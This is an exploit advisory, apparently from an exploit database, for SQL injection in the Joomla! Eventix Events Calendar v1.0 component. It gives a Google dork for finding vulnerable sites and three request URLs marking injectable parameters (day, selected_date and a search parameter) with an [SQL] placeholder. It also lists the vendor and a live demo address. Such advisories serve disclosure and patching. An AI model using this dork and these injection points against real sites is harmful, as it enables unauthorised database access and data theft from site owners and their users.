19 lines
No EOL
862 B
Text
19 lines
No EOL
862 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Eventix Events Calendar v1.0 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_eventix
|
|
# Date: 21.02.2017
|
|
# Vendor Homepage: http://informafix.fr/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/eventix-events-calendar/
|
|
# Demo: http://demo.informafix.fr/index.php?option=com_eventix
|
|
# Version: 1.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=2017-02-16&day=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventsday&selected_date=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_eventix&view=eventssearch&=[SQL]
|
|
# # # # # |